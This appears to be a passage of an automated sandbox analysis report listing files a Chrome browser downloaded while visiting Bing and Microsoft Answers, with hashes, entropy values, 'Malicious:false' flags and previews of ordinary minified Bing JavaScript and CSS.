                                                                            SHA-256:A319AF2E953E7AFDA681B85A62F629A5C37344AF47D2FCD23AB45E1D99497F13
                                                                            SHA-512:A177F5C25182C62211891786A8F78B2A1CAEC078C512FC39600809C22B41477C1E8B7A3CF90C88BBBE6869EA5411DD1343CAD9A23C6CE1502C439A6D1779EA1B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/EpR1iHlQbv86VKrI0rWd8XuDGXg.css
                                                                            Preview:z{a:1}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1495), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1495
                                                                            Entropy (8bit):5.2715271964580745
                                                                            Encrypted:false
                                                                            SSDEEP:24:7JVCEan7NLRWm8tRWv6lOnRWtFjDPTDRRKXtwBUSbMh0ZkPBoGBYwIlRW3PwTeJF:ANLwHtwWOnwtNjTDGXt0UqMKZYoGBYfc
                                                                            MD5:45345F7E8380393CA0C539AE4CFE32BD
                                                                            SHA1:292D5F4B184B3FF7178489C01249F37F5CA395A7
                                                                            SHA-256:3A40A1FF034448D68D92A75ABABA09BA5F2B71D130F5F6BDF160DCF8851529A9
                                                                            SHA-512:2BFD00BF303AD5A1E8413B5EE6A162167605511FEFB8DF61A8F40F80382F5520DF690A53B1058365F1D81562B2668376886D0F829517A642FCD87412801FE987
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:function addRemoveListenersOnAll(){var t=_ge("b_content"),n,i,r;t&&(n=_d.createElement("STYLE"),n.id=styleIdString,n.innerText="#b_results h2>a {padding: 16px 40px 0 6px;margin: -16px -40px 0 -6px;}",_d.head&&_d.head.appendChild(n),i=t.getElementsByClassName("b_ad"),i&&AddRemoveListener(i),r=t.getElementsByClassName("b_algo"),r&&AddRemoveListener(r))}function AddRemoveListener(n){for(var t,i,u=n.length,r=0;r<u;r++)if(t=n[r].getElementsByTagName("CITE"),t&&t.length>0)for(i=0;i<t.length;i++)sj_be(t[i],"click",algo_c)}function mouseMoveAfterTouchHandler(){sj_ue(document,"mousemove",mouseMoveAfterTouchHandler);var n=_d.getElementById(styleIdString);n&&n.parentNode&&n.parentNode.removeChild(n);sj_log("CI.TTC","mouse","started");sj_ue(document,"mousemove",mouseMoveAfterTouchHandler)}function touchStartHandlerAll(n){n.pointerType==="touch"&&(addRemoveListenersOnAll(),sj_log("CI.TTC","touch","started"),sj_ue(document,"pointerdown",touchStartHandlerAll),document.addEventListener("mousemove",mou
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (902), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):902
                                                                            Entropy (8bit):5.200751776659475
                                                                            Encrypted:false
                                                                            SSDEEP:24:Hl7/nJ4aZUv+MW/sRdrwq50n+pM12vk1Q4W3Idc4Wn:d/Caq+M93H5kOaC3Idmn
                                                                            MD5:76ED74A9FD9A74443976389C069CC74A
                                                                            SHA1:03AE45E49077B7D87D7FCC434574BA49F95664E3
                                                                            SHA-256:B443A3D58AEC4919E37DF4629F8C759A43091B1F63B5A815F8052DF0D8D46804
                                                                            SHA-512:D2D13DA2F47C2E94DB3A3B9B6F5185C8352268B1D336BAAA856177BE4B098535BD71BC53819FC73C0F4970DABCB7ECC7F375B4DEB1C25B25474551204B6921F4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/A65F5JB3t9h9f8xDRXS6SflWZOM.js
                                                                            Preview:var HeaderPlusAlgo_Selector;(function(n){function e(n){for(var u,l,h,e=[],c=t(sj_b.querySelectorAll(f+(n?", :focus":""))),s=0;s<c.length;s++)u=c[s],u.className.indexOf("b_ans")!=-1||u.id=="b_pole"?(l=t(u.querySelectorAll(r)),l.length==0&&(h=o(u),h&&e.push(h))):i(u)||e.push(u);return e}function t(n){for(var i=[],t=0;t<n.length;t++)i.push(n[t]);return i}function i(n){if(n){var t=window.getComputedStyle(n);return t&&t.display=="none"?!0:i(n.parentElement)}return!1}function o(n){for(var r,e=t(n.querySelectorAll(u)),f=0;f<e.length;f++)if(r=e[f],!i(r)&&r.tabIndex!=-1)return r;return null}var r="#b_results h2 a,#b_results h3 a,#b_results h4 a",u="input, select, textarea,a[href],*[tabindex = '0']",f=r+",#b_results .b_ans,#b_content #b_pole,#b_content #b_topw";n.getSelectableElements=e})(HeaderPlusAlgo_Selector||(HeaderPlusAlgo_Selector={}));NavSelector=HeaderPlusAlgo_Selector.getSelectableElements
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1039), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1039
                                                                            Entropy (8bit):5.394520629964255
                                                                            Encrypted:false
                                                                            SSDEEP:24:AaV1T141S2BjoljiHXdX4daXOcRWOkDqBlg:AK41PjEjiHKKwOjXg
                                                                            MD5:16050BAAF39976A33AC9F854D5EFDB32
                                                                            SHA1:94725020EFA7D3EE8FAED2B7DFFC5A4106363B5E
                                                                            SHA-256:039E6B3DF1D67341FB8E4A3815F0D1BB3292A2040334CEB9CFC4A8D6ABF2FB55
                                                                            SHA-512:CF0D54F0368FFBC6908216FD2573DF8F5FE4C34AC08E17301B8734B3FABC674672A7F456707F632F82F44B36812DAD8A0CF81A51D5CEA21EA7F0E18500298375
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var UetTag;(function(n){function t(n,t,i,r,u){var e,o,h,s,v,f,c;i===void 0&&(i="script");r===void 0&&(r="//bat.bing.com/bat.js");u===void 0&&(u="uetq");var y=n.location.search.substring(1),l=y.split("&"),a="";for(e=0;e<l.length;e++)if(o=l[e].split("="),o.length>=2&&o[0]==="form"){a=o[1];break}for(h=["MSC001","MSC002","MSC003","MSC005","MSC006","MSC007","MSC008","MSC009","MSC010","MSC011","MSC012","MSC013","MSC014","MSC015","MSC016","MSC017","MSC018","MSC019","MSC020","SP0001","SP0002","MOG001","MOG002","MOG003","MOG004","MOG005","MOG006","MOG007","MOG008","MOG009","MOG010"],s=0;s<h.length;s++)if(h[s]===a){n[u]=n[u]||[];v=function(){var t={ti:"355015334",q:null};t.q=n[u];n.UET&&(n[u]=new n.UET(t)||[]);n[u].push("pageLoad")};f=t.createElement(i);f.src=r;f.async=1;f.onload=f.onreadystatechange=function(){var n=this.readyState;n&&n!=="loaded"&&n!=="complete"||(v(),f.onload=f.onreadystatechange=null)};c=t.getElementsByTagName(i)[0];c.parentNode.insertBefore(f,c);break}}n.uetTaggingInit=t;t(
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (602), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):602
                                                                            Entropy (8bit):4.719600605255647
                                                                            Encrypted:false
                                                                            SSDEEP:12:fvhTmP6O7OITmnkKar5arAcJ6IR0O1pR0O5RaEURhpR6NZKZuteeC:fvudySKy5hcJ6KpyEIobKZetC
                                                                            MD5:9BA89C1BB0943881F49B3F287CB8AA5C
                                                                            SHA1:17E205E3081E85F4465FE048A5EF65AF17B0F84A
                                                                            SHA-256:1A4410685E3BFAE0B8914D4EEAE1A09434CA6215E1626E84F774535039CE5F3F
                                                                            SHA-512:3BC2765D818B6EFFDC8498AF9D26DEB62FA186F390E037A1841346B8C235ADEA61A34E0DC2AC0175779CCC99E90089FD7B5505B5D5D456302E7E74105F0666A1
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/F-IF4wgehfRGX-BIpe9lrxew-Eo.css
                                                                            Preview:#b_results .wr_fav .siteicon img,#b_results .wr_fav img.siteicon{vertical-align:text-top}#b_results .nattr img.siteicon,#b_results .mattr img.siteicon,#b_results .sh_favicon>img.siteicon{vertical-align:inherit;margin-bottom:-1px}#b_results .nattr span.wr_fav,#b_results .mattr span.wr_fav{margin-right:4px}.wr_fav{margin-right:8px}#b_results .nattr .b_attribution,#b_results .mattr .b_attribution,#b_results .cattr .b_attribution,#b_context .mattr .b_attribution,.wr_fav{display:inline-block}.wr_fav .cico{border-radius:0;display:inline-block;overflow:unset}.b_ansb .wr_fav,.wr_fav.b_hide{display:none}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 150177
                                                                            Category:dropped
                                                                            Size (bytes):52015
                                                                            Entropy (8bit):7.9952734547685935
                                                                            Encrypted:true
                                                                            SSDEEP:1536:vJhGm+7PUzhQu7xb5fpuSijlAVYYHNkPyJvs:RoA9l7FPRuAVYYHiPyJvs
                                                                            MD5:5F28D22CDF37837FA88F08A2050983AF
                                                                            SHA1:2FC8592FB2E4BE8193919AD56EE8588B24E7C0BE
                                                                            SHA-256:6E207B57EF73C7406D23E2533231E94B58B3C52AC63D208EC6664B152EC5B544
                                                                            SHA-512:DD526C86ACD7D940E54F9F6F848F03A4881DF9E17A067E7231E3D1765D846D0741FAFA8D7C89395B644CB6E0CB71098807411A0F534EA148379D23D31A032104
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:...........k[.H.0........F._...q.UE7....s..m..%$.I.....q.L.d....g....HyWdDdDdd...+.U....................9...vzvy.....`....C...A.....K.Q-.jqR..a.L........I...q.?...6I.?.a... ........%...d/..s.....Zp.DP{.O^..!.Eq.........^..M.......C.$.&q...Z.....:I..^..y._K..6....Q....h5.n........48..._.. .!N...X'...6.....8.Z..^..}.=At_..=........F.aV/|f.'O8.0..P<...R.{..:..i.R.O..A...............Tu.R..'0..2..Y<..!.-5...~].A..g.G...i.l5....F..,.....}.=L..a..1......._..F....N..L..1...O.0..A......\..Q.....g.}Y..h......?..$....4...L...ZdF..'.....;p.........{.^.v.wA=......Y..\..............?x..s. ...L.!......_'.....d.>....X6>.... ..y.w5...4i......E-.WW..9....5....83-...tgs;vgM.1.((...`l&.....4.j.\.4.:L;T..$w.8..:+M[d:...#*.X....vf.../........(.o........^.x/ZF..h/...3._c.wc..B......`n..\....$...K....z...,y!...W..b.WLEb.....oX.....4%.S$..nZ..H.........l..x......&vD.S.&...l.6 .H.....|>....].u|;..taJ^.0Jk.-fZ...!...[.(..8...7r.o.......Cbi.K...{.M.........)}DJF<.W..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (902), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):902
                                                                            Entropy (8bit):5.200751776659475
                                                                            Encrypted:false
                                                                            SSDEEP:24:Hl7/nJ4aZUv+MW/sRdrwq50n+pM12vk1Q4W3Idc4Wn:d/Caq+M93H5kOaC3Idmn
                                                                            MD5:76ED74A9FD9A74443976389C069CC74A
                                                                            SHA1:03AE45E49077B7D87D7FCC434574BA49F95664E3
                                                                            SHA-256:B443A3D58AEC4919E37DF4629F8C759A43091B1F63B5A815F8052DF0D8D46804
                                                                            SHA-512:D2D13DA2F47C2E94DB3A3B9B6F5185C8352268B1D336BAAA856177BE4B098535BD71BC53819FC73C0F4970DABCB7ECC7F375B4DEB1C25B25474551204B6921F4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var HeaderPlusAlgo_Selector;(function(n){function e(n){for(var u,l,h,e=[],c=t(sj_b.querySelectorAll(f+(n?", :focus":""))),s=0;s<c.length;s++)u=c[s],u.className.indexOf("b_ans")!=-1||u.id=="b_pole"?(l=t(u.querySelectorAll(r)),l.length==0&&(h=o(u),h&&e.push(h))):i(u)||e.push(u);return e}function t(n){for(var i=[],t=0;t<n.length;t++)i.push(n[t]);return i}function i(n){if(n){var t=window.getComputedStyle(n);return t&&t.display=="none"?!0:i(n.parentElement)}return!1}function o(n){for(var r,e=t(n.querySelectorAll(u)),f=0;f<e.length;f++)if(r=e[f],!i(r)&&r.tabIndex!=-1)return r;return null}var r="#b_results h2 a,#b_results h3 a,#b_results h4 a",u="input, select, textarea,a[href],*[tabindex = '0']",f=r+",#b_results .b_ans,#b_content #b_pole,#b_content #b_topw";n.getSelectableElements=e})(HeaderPlusAlgo_Selector||(HeaderPlusAlgo_Selector={}));NavSelector=HeaderPlusAlgo_Selector.getSelectableElements
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2696), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):2696
                                                                            Entropy (8bit):5.248435695658547
                                                                            Encrypted:false
                                                                            SSDEEP:48:hdorC4fo0TUE87aKOSfT1gt2lMJT1Ivrk8PUSFAa9D7R0QNy:MJo+UXF/fT1gt1xIHua9D7mQg
                                                                            MD5:6D59F14F93CD08A6714E2593C4E74189
                                                                            SHA1:2C528203BA2EBA96B9177AA65E51811B0800D56B
                                                                            SHA-256:3C3E3D23576C1480A0611019AB54070DD45FDEA74FAF172280DAC39B051B4359
                                                                            SHA-512:9FE3E120747E40503B6D6BA9C967E06D7413578F490CFCD453F4E7BD33C4674C7021189695AD67626A5C4A887EBDDC5DBE286C62531CD11B46921E742919ECA1
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/LFKCA7ouupa5F3qmXlGBGwgA1Ws.js
                                                                            Preview:var sa_storage={},sa_eL=!1;(function(){function c(t){var i=decodeURIComponent(sa_config.u+encodeURIComponent(t));return n.ascsr&&(i=i+"&csr=1"),n.isPathSearch&&(i=i+"&pths=1"),n.enableRequeryParam&&(i=i+"&rqry=1"),n.ascssdis||n.ascsr||(i=i+"&css=1"),_G.IG!==null&&_G.IG!==""&&_G.IG!==undefined?i+"&zis=1&pf=1&cvid="+_G.IG:""}function v(n){Log&&Log.Log&&Log.Log("AS.Error",n,"AS",!0)}function l(){var f,u=t&&t.getAttribute("value")?t.getAttribute("value").toLocaleLowerCase():"",r,o,e;u.length<30&&(r=sj_gx(),o=c(u),o!==""&&(r.open("GET",c(u),!0),i!==null&&i.parentNode!==null&&(e=(f=i.parentNode.offsetWidth)===null||f===void 0?void 0:f.toString(),n.cors?r.setRequestHeader("contentWidth",e):r.setRequestHeader("X-Autosuggest-ContentWidth",e)),n.IsBingPrivate&&!n.cors&&r.setRequestHeader("preferAnonymous","1"),r.onload=function(){r.status===200&&(!n.ascsr||n.ascsr&&y(r.responseText))&&(sa_storage[u]=r)},r.send()))}function y(n){if(typeof n!="string"||n.length===0)return!1;try{return JSON.parse(n
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (7155), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):7155
                                                                            Entropy (8bit):5.435598317550486
                                                                            Encrypted:false
                                                                            SSDEEP:192:paWT3REjhNn5y1Myoy+y25syZWNKo5xp5VUILj/rVEkVu4akUr:paWzEhNn5y1Myoy+y25syq/VUIX/1aka
                                                                            MD5:DC221228E109F89B8B10C48F2678FB46
                                                                            SHA1:1BFC85CBA5C424136941AC1DFD779A563B5BEED4
                                                                            SHA-256:F4FB7234959F48C2B2CA73FD6C35D36EAF65D8C431D982A1BA208F5CDC766419
                                                                            SHA-512:46F49E5AC18436251778D1F50C027729A2442ED6541C3162D878720703E37797B6028D96EB1568C23EC5006FB022C8E05855E250D6A1A590F41E890866529CD2
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/G_yFy6XEJBNpQawd_XeaVjtb7tQ.js
                                                                            Preview:var QuickSearch;(function(n){function et(n){var t=_w.location.protocol+"//"+_w.location.hostname+"/chat?q="+encodeURIComponent(n)+"&showconv=1&sendquery=1&form=IPRV10";a?window.open(t):_w.location.href=t}function w(n){sb_st(function(){var it,rt,ut,ft,f,a,w,st,d,at,s,v,g,vt,ht,y,p,ct,nt;if(l=null,NodeList.prototype.forEach||(NodeList.prototype.forEach=function(n,t){t=t||window;for(var i=0;i<this.length;i++)n.call(t,this[i],i,this)}),f=window.getSelection(),t=(it=f===null||f===void 0?void 0:f.toString())!==null&&it!==void 0?it:"",a=_ge("qs_searchBox"),w=o?_ge("mfa_root"):null,!o||w!=null){var lt,et=!0;f!=null&&f.anchorNode!=null&&(lt=f.anchorNode.nodeValue||f.anchorNode.textContent,et=!tt.some(function(n){return n!=null&&n!=undefined?n.contains(f.anchorNode):!1}),f.anchorNode.childNodes!=null&&f.anchorNode.childNodes.forEach(function(n){(n.nodeName==="INPUT"||n.nodeName==="TEXTAREA")&&(et=!1)}));st=!0;dt()||f.type=="Range"||(st=!1);t.trim()!=""&&et&&st&&u&&t.trim().length<2048?(sj_log("C
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (740), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):740
                                                                            Entropy (8bit):5.111935511678866
                                                                            Encrypted:false
                                                                            SSDEEP:12:Nc0u45yskXrK/d++nH1DRRYXJXtHuzxN/heVl4vc5HuQZKXtrRORT5vvt:K0uYyskXrK/lHlRRUXJoN/heEUHHKtru
                                                                            MD5:B08FF6B34D04C1B75E692DBC2ECA0AD9
                                                                            SHA1:694AC5AC1D2DB59DD7180BE36B62810BB8C8FF18
                                                                            SHA-256:C21CCE393B83CFAB856AAC292458407ED1B0DB51364ED7A523806DAC972B291F
                                                                            SHA-512:61E0D2F5BFE5EDAC42439A139CFCA99BD63A2FED7235FF9238AE79BF9B0C068855A0741E181048B4040EEC1B2F0F448734100A198AF614223E1A3CA0C648E924
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/aUrFrB0ttZ3XGAvja2KBC7jI_xg.js
                                                                            Preview:var LoadThirdPartyIframe;(function(n){function r(){e();var n=document.createElement("iframe");n.id=i;n.style.display="none";n.src="".concat(t,"/instrument/cookieenabled");document.body.appendChild(n)}function u(){var n=document.getElementById(i);n&&n.parentNode&&n.parentNode.removeChild(n)}function f(n){n&&n.origin===t&&Log&&Log.Log&&(Log.Log("ClientInst","CookieInstrumentation","Thirdparty",!1,"IsEnabled",n.data),u())}function e(){var n=sb_gt(),t;n&&(t=Math.floor(n/1e3)*1e3,sj_cook.set("SRCHUSR","TPC",t.toString(),!0,"/"))}function o(){window.addEventListener("message",function(n){return f(n)})}function s(){o();r()}var t="https://3pcookiecheck.azureedge.net",i="3piframe";n.load=s})(LoadThirdPartyIframe||(LoadThirdPartyIframe={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):238
                                                                            Entropy (8bit):4.682534124662334
                                                                            Encrypted:false
                                                                            SSDEEP:6:dHBsRfMqedQHLYGwBsRfMqedQHpzr5ANL8BsRfMq89mn:I2tut2tu0NN2T9m
                                                                            MD5:66541AD000B292F2C78AAD70BE38AE63
                                                                            SHA1:B340D641225D893042038284CA4EAEC355B715B1
                                                                            SHA-256:0DA83CF66A0A78CDC32F9F126BF483ACB2AF47B29CB96996F3E451043BB355C2
                                                                            SHA-512:D43EAB0AFBF9DE3C274A8BBDD54A16F9956A909CFC88AE2EDAFE4FC42908A628A3ECF59E0AD9E86C700BBE94F5C0166FD466F6A7FA362D8EC8D2757ADAEF282F
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/s0DWQSJdiTBCA4KEyk6uw1W3FbE.css
                                                                            Preview:#b-scopeListItem-menu .b_sp_over_menu .b_scopebar_item{padding:0 0 0 10px}#b-scopeListItem-menu .b_sp_over_menu .b_scopebar_item a{text-transform:uppercase}.b_scopebar #b-scopeListItem-menu .b_sp_over_menu{margin:5px 0 0 14px;height:auto}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):127
                                                                            Entropy (8bit):4.588281657836205
                                                                            Encrypted:false
                                                                            SSDEEP:3:JWz6CjKYFGdLMX8HNMzjmFlHoR4VkMotRfAkMo+:JWNj6dLtoy1oeVLokLo+
                                                                            MD5:CA0F050B370F148BAE15455EDC957DD4
                                                                            SHA1:3AF094734B8306BBC7A1A8E886525A9E8F3E04D1
                                                                            SHA-256:7C91092106B8F25E4A285ADCB3E1897120E07347AB423E95ABBF79F82E57E5FC
                                                                            SHA-512:9B38E98B315AA1EDBCCF54A4CD67137A35FF9A936075DDDEE094A1D1D8AF23A332DC343E2B2F7A4E60335CE9E55F162623C640B47049D22748391155026A0162
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/OvCUc0uDBrvHoajohlJano8-BNE.css
                                                                            Preview:#b_header .b_searchboxForm pwa-container-wrapper{position:absolute !important;top:-80000px !important;left:-80000px !important}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1730), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1730
                                                                            Entropy (8bit):5.167868795030358
                                                                            Encrypted:false
                                                                            SSDEEP:24:ppStAKm2ZNFPiXKK741zr79qrEK7771SZmnSu7kZwlxGHDF1X7IIct7JFq2n7026:wA/obHGb0PZwvGjYgjOJ/pOh1KtG
                                                                            MD5:71FEF373F46027630BC21602EBFD88DD
                                                                            SHA1:06291B5A7CFD861782E6FE2E8BF26BEAF8B45CA3
                                                                            SHA-256:1AC2C984ED3BB8AF20CE6345D79F87A72343EC63B342DC35B1B331799E126377
                                                                            SHA-512:848CCD93DAA0BFF6DA1ADA4B031B47E984841BD4D8FAB3478D58F686B22C83BCCC0594E75589B1EB1EBC0C71234B7BBF43D4BB423613475B098C059ABCE672DF
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/BikbWnz9hheC5v4ui_Jr6vi0XKM.js
                                                                            Preview:var SkipToContent;(function(){function n(n,t){sj_log===null||sj_log===void 0?void 0:sj_log("CI.".concat(r),n,t!==null&&t!==void 0?t:"1")}function u(t){t&&t.key==="Tab"&&i&&(n("FirstAppear"),i=!1)}function f(){var r,u,f,e,o,s,h,c,l,a,v,y,n=(u=(r=document.querySelector("cib-serp"))===null||r===void 0?void 0:r.shadowRoot)===null||u===void 0?void 0:u.querySelector("cib-conversation"),p=(n===null||n===void 0?void 0:n.getAttribute("chat-type"))==="consumer",w=(o=(e=(f=n===null||n===void 0?void 0:n.shadowRoot)===null||f===void 0?void 0:f.querySelector("cib-welcome-container"))===null||e===void 0?void 0:e.shadowRoot)===null||o===void 0?void 0:o.querySelector(".legal-items a"),t,i;n&&w&&!p?t=w:n&&p&&(i=document.querySelector("cib-serp .b_ziCont"),t=i&&i.style.display!=="none"?i.querySelector(".slide[tabindex='0']"):(y=(v=(a=(l=(c=(h=(s=n.shadowRoot)===null||s===void 0?void 0:s.querySelector("cib-chat-turn"))===null||h===void 0?void 0:h.shadowRoot)===null||c===void 0?void 0:c.querySelector("cib-
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (2014), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):2016
                                                                            Entropy (8bit):5.3161096027675105
                                                                            Encrypted:false
                                                                            SSDEEP:48:bnXL8sjfZ/Fslrgj3rzIRlK0KqoLi7XSOLFTt+jCz1T9XNZTs3Gan/An0:bnoshqlMQRlZTolKOEXNZsWan/An0
                                                                            MD5:D807DBBB6EE3A78027DC7075E0B593FF
                                                                            SHA1:27109CD41F6B1F2084C81B5D375EA811E51AC567
                                                                            SHA-256:0ACDCE370092C141B0C6617ED6E2163F04BB9B93D3213B62C2BC7A46FE0243C7
                                                                            SHA-512:E037DFC31D595B459660FE7D938EEDB4F43D208D247174EE8D6FD0D125F211142CD73497E4601893CECB6F565B7E2E7815CE416D72BB95504D3F277E4E806D11
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/JxCc1B9rHyCEyBtdN16oEeUaxWc.js
                                                                            Preview:var SerpKeyboardNavigation;(function(){function c(){h=_d.activeElement;n=null;u=null;e=!1;t=-1;nt();u=_w.NavSelector&&NavSelector(!1)}function p(){v();n=null}function w(i){var e,h,o;i&&(e=_d.activeElement,h=s&&e&&e.className&&e.className.indexOf("feedback-binded")!==-1,i.keyCode==r.Tab&&s&&(f("TOP"),s=!1),u&&e&&e.className!=="b_searchbox"&&!h&&(i.keyCode==r.Enter?(n=null,f(t==-1?"EN":"EE",t)):b(i)&&(o=k(i.keyCode),o!==-1&&o!==t&&(tt(o),sj_pd(i)))))}function f(n,t){sj_log("CI.SerpKeyboardNav",n,t?t.toString():"")}function b(t){var i,r=(i=_d.querySelector("#b_sydConvCont cib-serp"))===null||i===void 0?void 0:i.getAttribute("mode");return n||h==_d.activeElement?t.altKey||t.ctrlKey?!1:r&&["conversation","notebook"].includes(r)?!1:!0:!1}function k(n){if(n===r.Tab)return d();if(n===r.Down||n===r.Up){var t=document.activeElement;return t&&(t.tagName.toLowerCase()==="select"||t.tagName.toLowerCase()==="input")?-1:g(n===r.Down)}return-1}function d(){var i=-1;return n?(v(),e=!0,t=-1,f("TO")):(i=
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2128), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):2128
                                                                            Entropy (8bit):5.442460477719289
                                                                            Encrypted:false
                                                                            SSDEEP:48:tj4UnhFYnV9BxNW42yoJPDvDy39YTNwtuu0/px0aBw/V966:OYFGjMlS9YTKtuuSpx0aBkV966
                                                                            MD5:ABA86A34F3FDBCB7DFE2255FD75141D8
                                                                            SHA1:1266746DDFD30DB4F4DB60A1DF92CE696378F7FD
                                                                            SHA-256:FA3C61A6725A959DCCDA1A97E82B433EF359B49D646A5D389CC47822085B5A2D
                                                                            SHA-512:EC138E078F3E379C40A7CF2C674CA9CC06A3F985C76A2940CA797D39202513053B6A4EA2ECE875A303AAFB2CC2004EE2C5AA4A6DF1C31C09AA3556BA952CEF4C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/EmZ0bd_TDbT022Ch35LOaWN49_0.js
                                                                            Preview:var SHlochelper;(function(n){function t(n,t){var u=n.split("?"),f,i,r;if(u.length>=2){for(f=encodeURIComponent(t)+"=",i=u[1].split(/[&]/g),r=i.length-1;r>=0;r--)i[r].lastIndexOf(f,0)!==-1&&i.splice(r,1);return u[0]+(i.length>0?"?"+i.join("&"):"")}return n}function r(n){var r,s,t;if(typeof _w.Log2!="undefined"&&Log2.LogEvent)Log2.LogEvent("ClientInst",n,null,null,null,null,null,null),Log2.ForceFlush&&(r={force:!0,useSendBeacon:!0},Log2.ForceFlush(!0,r));else{var u="/fd/ls/lsp.aspx",f=(new Date).getTime(),h="<E><T>Event.ClientInst<\/T><IG>"+_G.IG+"<\/IG><TS>"+f+"<\/TS><D><![CDATA[["+n.replace("]\]>","]]]\]><![CDATA[>")+"]]\]><\/D><\/E>",e="<ClientInstRequest><Events>"+h+"<\/Events><STS>"+f+"<\/STS><\/ClientInstRequest>",o=!1;navigator&&navigator[i]&&(s=new Blob([e],{type:"text/plain"}),o=navigator[i](u,s));o||(t=sj_gx(),t.open("POST",u,!0),t.setRequestHeader("Content-Type","text/xml"),t.send(e))}}function u(n){if(n){for(var t=_w,i=n.split("."),u=i.length,r=0;t&&r<u;)t=t[i[r++]];return t}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65518), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):68368
                                                                            Entropy (8bit):5.155467584086129
                                                                            Encrypted:false
                                                                            SSDEEP:768:J6IEeNkigQNRE6dQj6eFEiEDKHkVR3pzSqX0NMa/:J6Q6igQNRYujKoR3pzgr/
                                                                            MD5:45510D3B874A3492640BCEBE8014D399
                                                                            SHA1:0787607F369C605902444930FBF064813622CECA
                                                                            SHA-256:94AE91050FA873D15FEB03900514A7BFEBB35BE2038394631AF79F2F4F391AE0
                                                                            SHA-512:DF2519C9AD4C2639652F114642986D50BE639A51E9B613896CF9C370D3BD61F51E2834F5F5B170314F518585DA28DD3C1D2664289ADCE3A0819FE624E5CF1F2E
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://answers-afd.microsoft.com/static/css/mwf/bundle/bundle.thread-list-no-kendo.1.0.4.354.min.css
                                                                            Preview:#Header .c-uhfh-gcontainer{display:block}#Header #uhf-c-nav .c-uhf-menu.js-nav-menu ul{margin-top:-3px}#Header .brand-blue{float:left !important}#Header #PubCatMenuSpaceHolder{display:none}#Header #PrivCatMenuSpaceHolder{display:none}#Header .brand-blue #AnsAskQuestionMenuItem{bottom:50px;padding-left:26px}#Header #mainSearchDiv{float:left}#Header button.c-action-trigger.c-glyph.glyph-chevron-right.js-secondary-paddle{display:none !important}#searchForm{display:none !important}.rtl #Header .brand-blue #AnsAskQuestionMenuItem{right:6px;float:left}#Header #uhfNavLinksOverride .brand-blue #AnsAskQuestionMenuItem{bottom:50px;padding-left:26px;float:left}.rtl #Header #uhfNavLinksOverride .brand-blue #AnsAskQuestionMenuItem{float:right}#me-control-data{display:none}#c-uhf-nav-cta a#buyInstallButton{margin-top:12px}html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,b
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (19011), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):19011
                                                                            Entropy (8bit):5.408278425757407
                                                                            Encrypted:false
